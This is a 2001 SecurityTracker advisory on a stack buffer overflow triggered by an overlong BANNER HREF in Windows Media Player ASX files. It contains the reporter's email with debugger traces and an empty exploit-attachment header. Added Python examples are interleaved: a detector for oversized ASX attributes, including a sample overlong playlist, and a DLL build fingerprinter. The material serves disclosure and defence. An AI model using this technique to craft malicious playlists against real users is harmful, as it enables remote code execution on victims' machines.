SecurityTracker.com
SecurityTracker Archives

Category:   Application (Multimedia)  >   Windows Media Player
Vendors:   Microsoft
Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System
SecurityTracker Alert ID:  1001467
SecurityTracker URL:  http://securitytracker.com/id/1001467
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 2 2001
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 6.4, possibly others
Description:   It is reported that Windows Media Player contains a vulnerability in its processing of certain ASX tags that allows a remote user to cause the Media Player client to execute arbitrary code on the client's host.

The processing of the HREF attribute of the BANNER tag reportedly contains a buffer overflow that can be used to overwrite the stack. The vulnerability exists in certain versions of DXMASF.DLL; the reporter lists the affected builds by file size and PE time stamp and notes that the build shipped with the wmqfe33955.exe patch is also affected. Because an ASX playlist is a plain text file, a remote user can craft a malicious ASX file and deliver it to the intended victim via a web page or via an HTML-based e-mail message.

The Source Message contains some additional information as well as an encoded version of a demonstration exploit ASX file.
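The trigger described above is an ASX playlist whose BANNER element carries an overlong HREF value. Since ASX is plain text, a mail gateway or proxy can screen for it before the player ever parses it. The following Python is an added example, not code from this SecurityTracker entry or from the reporter: it constructs a sample playlist (the ENTRY/REF line satisfies the reporter's note that the file must point at a real .asf/.avi) and flags attribute values above a length limit. The 260-byte limit is an assumption (a MAX_PATH-sized buffer), not a figure from the page, and the checker reports any oversized attribute rather than only BANNER/HREF because the follow-up messages list further ASX tags with the same problem.

```python
import re

MAX_ATTR_LEN = 260  # assumption: a MAX_PATH-sized stack buffer; not a figure from the report


def build_asx(media_url, banner_href):
    """Constructed sample: an ASX 3.0 playlist with a BANNER element and one ENTRY."""
    return (
        '<ASX VERSION="3.0">\n'
        f'  <BANNER HREF="{banner_href}" />\n'
        '  <ENTRY>\n'
        f'    <REF HREF="{media_url}" />\n'
        '  </ENTRY>\n'
        '</ASX>\n'
    )


# Opening tags (closing tags start with '/', which the name class rejects).
_TAG = re.compile(r'<\s*([A-Za-z][\w:-]*)([^>]*)>')
# name="value" or name='value' pairs inside a tag.
_ATTR = re.compile(r'([A-Za-z][\w:-]*)\s*=\s*(?:"([^"]*)"|\'([^\']*)\')')


def oversized_attrs(asx_text, limit=MAX_ATTR_LEN):
    """Return [(TAG, ATTR, length)] for every attribute value longer than limit.

    Names are upper-cased because ASX element and attribute names are
    case-insensitive, so "banner href" and "BANNER HREF" must compare equal.
    """
    hits = []
    for tag in _TAG.finditer(asx_text):
        for name, dq, sq in _ATTR.findall(tag.group(2)):
            value = dq if dq else sq
            if len(value) > limit:
                hits.append((tag.group(1).upper(), name.upper(), len(value)))
    return hits


def banner_href_overflow(asx_text, limit=MAX_ATTR_LEN):
    """True for the specific case in the report: a BANNER HREF longer than limit."""
    return any(t == "BANNER" and a == "HREF"
               for t, a, _ in oversized_attrs(asx_text, limit))


if __name__ == "__main__":
    # Constructed input: a playlist with a 2000-byte BANNER HREF.
    sample = build_asx("http://example.invalid/clip.asf", "A" * 2000)
    for tag, attr, n in oversized_attrs(sample):
        print(f"{tag}/{attr}: {n} bytes")
```

Run it against attachments or proxied downloads with a `.asx`/`.wax` extension or an `video/x-ms-asf` content type; a hit is a reason to quarantine the file, not a proof of exploitation, since a legitimate but unusually long URL also trips the length check.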

Impact:   A remote user can cause the Media Player to execute arbitrary code on the Media Player's host.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:   Boundary error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Another Vulnerable ASX Tag) Re: Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System
A user reports another ASX tag that will trigger a buffer overflow vulnerability.
(Microsoft Releases Fix) Re: Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System
The vendor has released a fix.
(Another ASX Vulnerability) Re: Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System
A user reports another vulnerability.
(CIAC Issues Bulletin L-089) Re: Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System
CIAC issues a bulletin.



 Source Message Contents

Subject:  Microsoft Media Player ASX Parser buffer overflow vulnerability


This is a multi-part message in MIME format.

------=_NextPart_000_2fe8_45ca_5277
Content-Type: text/plain; format=flowed

-------------------------------------------------------------------
LEGAL STATEMENT:

The information contained in this mail message is confidential.
The information contained in this mail message is a trade
secret of mine and is protected under law.

Basically: You're not allowed to read or use or act upon the information
contained in this message unless you fall into a
category who are specifically allowed to.

1. People/entities with any formal relationship with Microsoft are
not allowed to read the content of this message.
2. People who do not fall into category 1 are allowed to do anything
they like but are not allowed to bypass this information forward.

--------------------------------------------------------------------
RANDOM RANT:

You know, somebody's got to take care of the client side.
--------------------------------------------------------------------
REVELATION:

HREF attribute of BANNER tag can be abused to smash our lovely stack.

This information applies to Media Player 6.4 at least.
You can try it out with your version at
http://mediaplayerbug.tripod.com/.

Known status of different versions of dxmasf.dll:
Invulnerable: Size 427280 bytes. Time stamp 0x35ed5d3d. (From Finnish SP4
CD.)
Vulnerable: Size 498960 bytes. Time stamp 0x382cbe58. (From mpfull.exe
version 6.4. dunno more.)
Vulnerable: Size 525008 bytes. Time stamp 0x3a2ed2f1. (The patched version
that comes in wmqfe33955.exe.)
(Got the time stamps using File Viewer.)

As for the .asx attachment, it won't work as it is. You've
got to edit it to refer to a valid .asf/.avi file. I didn't want to waste
bandwidth. It is a text file, so that should not be too much trouble.

Umm. Analysis.txt is at Tripod too, no link to it though. Guess the
URL if you need it. :)
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

------=_NextPart_000_2fe8_45ca_5277
Content-Type: text/plain; name="Analysis.txt"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="Analysis.txt"

Known status of different versions of dxmasf.dll:
Invulnerable: Size 427280 bytes. Time stamp 0x35ed5d3d. (From Finnish SP4
CD.)
Vulnerable: Size 498960 bytes. Time stamp 0x382cbe58. (From mpfull.exe
version 6.4. dunno more.)
Vulnerable: Size 525008 bytes. Time stamp 0x3a2ed2f1. (The patched version
that comes in wmqfe33955.exe.)
(Got the time stamps using File Viewer.)

Some nice analysis data is attached. These are in no way complete and even
some false information might appear here or there.

--8<------------------------Cut-here---------------------------8<-------------

Execution path of DXMASF.DLL (Time stamp 0x3a2ed2f1.) in detail follows.
This is the recently patched one.

1D3612BD : MSDXM!0x1D3197F0( 0x00298678, 0x0009e724, 0x002a015c ) {
	1D3197F0 :
	1D319843 : Kernel32!LoadLibraryA("dxmasf.dll")
	1D319858 : Kernel32!GetProcAddress("UtilLoadImage",0x11f00000,0)
	1D31987A : Kernel32!0x77F350A3(0,0,0x9e724,-1,0x6f13c,0x825,0,0)
	1D319895 : DXMASF!UtilLoadImage( ? )
		1FF26708 :
		1FF26731 : 1FF26A97()
		1FF2673C : 1FF26AA1()
			1FF26AA1 :
			1FF26AB5 : 1FF26C2A()
			1FF26ACC : Kernel32!0x77F1297C() 1FF010D8
			1FF26AD4 : 1FF3EFA6()
			1FF26AE0 : Kernel32!0x77F127E6() 1FF0108C
			1FF26AFE : 1FF3F3E8()
			1FF26B44 : 1FF3F2B4()
			1FF26B5C : 1FF3F260()
			1FF26BB5 : Wininet!0x702079AB() 1FF012F0
			1FF26BF3 : Kernel32!0x77F1297C() 1FF010D8
			1FF26BFB : 1FF3EFA6()
			1FF26C0C : Kernel32!0x77F127E6() 1FF0108C
			1FF26C19 : } <- Let the parties begin!
		1FF26741 :
	1D319898 :
1D3612C0 :

--8<------------------------Cut-here---------------------------8<-------------

Execution path of DXMASF.DLL (Time stamp 0x382cbe58.) in detail follows.

1D319895 : DXMASF!UtilLoadImage( ? ) {
	1FF26716 :
	1FF2674A : 1FF26AAF( x ) {
		1FF26ADA : Kernel32!0x77F1297C( x ) 1FF010D8
		1FF26AE2 : 1FF3EFB6()
		1FF26AEE : Kernel32!0x77F127E6() 1FF0108C
		1FF26B0C : 1FF3F3F8() (retrieve the string address at heap?)
		1FF26B3B : movs
		1FF26B52 : 1FF3F2C4:7801FAAD:fopen() (fails)
		1FF26B6A : 1FF3F270:780252FE:strrchr() (strip "C:\")
		1FF26BAC : movs
		1FF26BC3 : WININET!0x702079AB() 1FF012F0 (try if it's an URL?)
		1FF26BE8 : movs (copy back the stripped string)
		1FF26C01 : Kernel32!0x77F1297C() 1FF010D8
		1FF26C09 : 1FF3EFB6:780037CA:new()
		1FF26C1A : Kernel32!0x77F127E6() 1FF0108C
		1FF26C27 : } <- Let the parties begin!
	1FF2674F :
	}
1D319898 :

--8<------------------------Cut-here---------------------------8<-------------

Execution path of DXMASF.DLL (Time stamp 0x35ed5d3d.) in detail follows.
This is the SP4 one.

1D319895 : DXMASF!UtilLoadImage=1FF34CCD() {
	1FF34CF6 : 1FF3505C() (dummy init)
	1FF34D01 : 1FF35066( 0x0006F13C ) {
		1FF3507A : 1FF351BF()
		1FF35091 : Kernel32!0x77F1297C( 0x0006F13C ) 1FF010E8
		1FF35099 : 1FF368A6:780037CA:new( 0x178 ) 1FF011E8
		1FF350A5 : Kernel32!0x77F127E6( heapbuf(0x002A8C90), 0x0006F13C ) 1FF01080 {
			77F1282F : movs
			}
		1FF350AB :
		1FF350C4 : URLMON!0x702B7BC2( 0, 0x2A8C90, 0x6EFA0, 0x104 ) 1FF01328 {
			702B7BE0 : Kernel32!0x77F1297C() (strlen)
			702B7BF1 : URLMON!0x702B753C( 0x44 )
			702B7C15 : to_wide_char( 0, 0, 0x2A8FD0, -1, 0x6EDF0 ) 702712B8
			702B7C26 : OLE32!0x77B2122C( 0x208, 0x6EDF0 )
			702B7C44 : 702B77F8()
			702B7C65 : Kernel32!0x77F12AE7()
			702B7C72 : Kernel32!0x77F350A3()
			}
		1FF350EB : 1FF36D9E:7801FAAD:fopen( 0x6EFA0, 0x1FF057A0 )
		1FF350CF : 1FF368A0:78003C6E:delete( 0x2A8C90 ) 1FF011E0

	}
1D319898 :

--8<------------------------Cut-here---------------------------8<-------------


------=_NextPart_000_2fe8_45ca_5277
Content-Type: application/octet-stream; name="Money_is_wrong.asx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Money_is_wrong.asx"
------=_NextPart_000_2fe8_45ca_5277--

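The reporter identifies the affected builds of dxmasf.dll by file size and PE time stamp, read with a file viewer. The Python below is an added example, not code from the page or from the reporter: it reads the COFF TimeDateStamp directly from the PE header and matches the (size, stamp) pair against the three builds in the report's table. Any other pair is reported as unknown rather than guessed, because the table covers only the copies the reporter examined; note that the reporter lists the "patched" wmqfe33955.exe build as vulnerable as well. `fake_pe` builds a constructed MZ/PE shell so the lookup can be exercised offline; `classify_file` is the call to run against a real DLL.

```python
import struct
from datetime import datetime, timezone

# (file size in bytes, COFF TimeDateStamp) -> status, copied from the report's table.
KNOWN = {
    (427280, 0x35ed5d3d): "invulnerable (Finnish SP4 CD)",
    (498960, 0x382cbe58): "vulnerable (mpfull.exe, Media Player 6.4)",
    (525008, 0x3a2ed2f1): "vulnerable (patched build from wmqfe33955.exe)",
}


def pe_timestamp(data):
    """Return the COFF TimeDateStamp of a PE image held in bytes.

    Layout: 'MZ' at offset 0; e_lfanew (DWORD) at 0x3C; the four-byte PE
    signature at e_lfanew; then the COFF header, whose fields are
    Machine(2) NumberOfSections(2) TimeDateStamp(4) ..., so the stamp sits
    at e_lfanew + 8.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return stamp


def classify(data):
    """Match (size, stamp) of the image bytes against KNOWN; never guess."""
    key = (len(data), pe_timestamp(data))
    return key, KNOWN.get(key, "unknown: not one of the builds in the report")


def classify_file(path):
    """Classify an on-disk dxmasf.dll (or any PE) by its size and time stamp."""
    with open(path, "rb") as f:
        return classify(f.read())


def stamp_to_utc(stamp):
    """PE time stamps are seconds since the Unix epoch; render one for humans."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def fake_pe(size, stamp, e_lfanew=0x80):
    """Constructed test input: a zero-filled MZ/PE shell with the given size and stamp."""
    img = bytearray(size)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<I", img, e_lfanew + 8, stamp)
    return bytes(img)


if __name__ == "__main__":
    # Exercise the lookup on constructed shells matching the report's table.
    for (size, stamp), _ in KNOWN.items():
        key, verdict = classify(fake_pe(size, stamp))
        print(f"{size:7d} bytes  0x{stamp:08x} ({stamp_to_utc(stamp)})  {verdict}")
```

Size and stamp together are only a fingerprint of a particular build, not a signature of the overflow; a copy that differs in either field needs the test page the reporter links or a debugger session to settle its status.
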
Copyright 2021, SecurityGlobal.net LLC